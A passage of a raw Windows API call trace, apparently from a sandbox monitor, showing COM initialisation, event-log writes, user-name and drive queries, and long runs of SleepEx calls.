bAlertable=0) returned 0x0 Thread: id = 69 os_tid = 0xa8c [0242.209] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0242.209] CoGetContextToken (in: pToken=0x703fbfc | out: pToken=0x703fbfc) returned 0x0 [0242.209] CObjectContext::QueryInterface () returned 0x0 [0242.209] CObjectContext::GetCurrentThreadType () returned 0x0 [0242.209] Release () returned 0x0 [0242.210] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0242.210] CoUninitialize () [0242.210] RoInitialize () returned 0x1 [0242.210] RoUninitialize () returned 0x0 Thread: id = 70 os_tid = 0xe04 [0242.220] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0242.220] RoInitialize () returned 0x1 [0242.220] RoUninitialize () returned 0x0 [0242.222] GetCurrentProcessId () returned 0x13b8 [0242.224] EtwEventWriteTransfer (RegHandle=0x818fa8, EventDescriptor=0x2e, ActivityId=0x70bf0ec, RelatedActivityId=0x70bf09c, UserDataCount=0x0, UserData=0x8) returned 0x0 [0242.224] EtwEventWriteTransfer (RegHandle=0x818fa8, EventDescriptor=0x2e, ActivityId=0x70bf118, RelatedActivityId=0x70bf0c8, UserDataCount=0x0, UserData=0x2) returned 0x0 [0242.225] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x65c [0242.230] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_Disabled", lpBuffer=0x70be84c, nSize=0x80 | out: lpBuffer="က牘\x01") returned 0x0 [0242.230] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Threading.OverlappedData_MinCount", lpBuffer=0x70be84c, nSize=0x80 | out: lpBuffer="က牘\x01") returned 0x0 [0242.233] EtwEventRegister (in: ProviderId=0x49f0a84, EnableCallback=0x4532cf6, CallbackContext=0x0, RegHandle=0x49f0a60 | out: RegHandle=0x49f0a60) returned 0x0 [0242.233] EtwEventSetInformation (RegHandle=0x8f8d28, InformationClass=0x50, EventInformation=0x2, InformationLength=0x49f0a28) returned 0x0 [0242.235] ConnectNamedPipe (in: hNamedPipe=0x628, lpOverlapped=0x49f0c6c | out: lpOverlapped=0x49f0c6c) returned 0 Thread: id = 71 os_tid = 0xc74 Thread: id = 72 os_tid = 0x804 [0244.874] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0244.874] CoGetContextToken (in: pToken=0x723f724 | out: pToken=0x723f724) returned 0x0 [0244.874] CObjectContext::QueryInterface () returned 0x0 [0244.874] CObjectContext::GetCurrentThreadType () returned 0x0 [0244.875] Release () returned 0x0 [0244.875] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0244.875] CoUninitialize () [0244.875] RoInitialize () returned 0x1 [0244.875] RoUninitialize () returned 0x0 [0244.875] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.067] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.039] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.166] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.207] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.253] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.893] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.022] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.112] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.932] CoTaskMemAlloc (cb=0x804) returned 0x7e21d78 [0248.932] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7e21d78, nSize=0x723f1d0 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x723f1d0) returned 0x1 [0248.933] CoTaskMemFree (pv=0x7e21d78) [0248.933] GetUserNameW (in: lpBuffer=0x723ef64, pcbBuffer=0x723f1dc | out: lpBuffer="FD1HVy", pcbBuffer=0x723f1dc) returned 1 [0248.935] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c17270*="Registry", lpRawData=0x4c17198) returned 1 [0249.091] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c50234*="Alias", lpRawData=0x4c5015c) returned 1 [0249.095] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c52344*="Environment", lpRawData=0x4c5226c) returned 1 [0249.096] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x723f0a4, nSize=0x80 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.096] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x104, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0249.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x723f15c) returned 1 [0249.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x723f1d8 | out: lpFileInformation=0x723f1d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0249.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x723f158) returned 1 [0249.096] GetLogicalDrives () returned 0x4 [0249.097] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0249.097] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x723f148) returned 1 [0249.097] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x723f050, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x723f170, lpMaximumComponentLength=0x723f16c, lpFileSystemFlags=0x723f168, lpFileSystemNameBuffer=0x723efe8, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x723f170*=0xb4197730, lpMaximumComponentLength=0x723f16c*=0xff, lpFileSystemFlags=0x723f168*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0249.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x723f144) returned 1 [0249.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.098] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0249.098] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x723f100) returned 1 [0249.098] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x4c530ac | out: lpFileInformation=0x4c530ac*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x865407b, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0x865407b, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0249.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x723f0fc) returned 1 [0249.098] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0249.098] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.099] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0249.099] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0249.099] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0249.099] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.099] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.099] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0249.100] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c54c44*="FileSystem", lpRawData=0x4c54b6c) returned 1 [0249.103] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c56c8c*="Function", lpRawData=0x4c56bb4) returned 1 [0249.106] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4c58cd4*="Variable", lpRawData=0x4c58bfc) returned 1 [0249.234] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.286] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.908] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.451] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.468] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.571] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.709] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.717] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.718] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.726] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.752] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.763] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.771] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.785] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.825] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.833] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.110] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.124] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.146] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.354] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.432] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.768] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.254] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.261] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.379] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.311] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.436] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.481] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.515] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.537] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.634] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.927] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0277.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.027] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0278.037] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.825] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.937] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.938] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.017] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.256] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.278] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.279] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.368] SleepEx 